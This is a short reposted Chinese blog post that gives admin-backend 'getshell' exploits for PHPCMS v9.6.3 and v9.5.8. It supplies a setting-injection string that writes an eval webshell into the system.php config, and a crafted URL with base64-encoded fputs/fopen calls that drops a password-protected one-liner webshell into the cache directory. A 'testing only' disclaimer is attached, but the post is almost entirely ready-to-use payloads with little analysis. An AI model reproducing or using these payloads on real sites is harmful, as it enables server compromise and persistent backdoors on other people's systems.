phpcms后台getshell

本文轉載自查看原文 2020-01-03 21:26 1346 安全/ phpcms/ getshell

內容僅供測試使用，請遵守網絡安全法

v9.6.3

安裝完后登陸后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login

后台 - 設置 - connect

在此處插入 \\',@@eval($_POST[123]),//，閉合掉 \phpcms\caches\configs\system.php 這里的 key 參數會將一句話木馬寫入 system.php 文件。

訪問：

v9.5.8

http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=

會生成 /caches/caches_model/caches_data/test.php 一句話
密碼 1

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 PHPCMS v9.6.0后台getshell 若依后台Getshell PHPCMS V9.6.3 getshell小記 PHPCMS v9.5.6 通殺getshell(前台) Wordpress 后台GetShell總結 phpcms后台管理 zblog后台getshell 網站后台getshell 通達OA后台getshell weblogic弱口令+后台getshell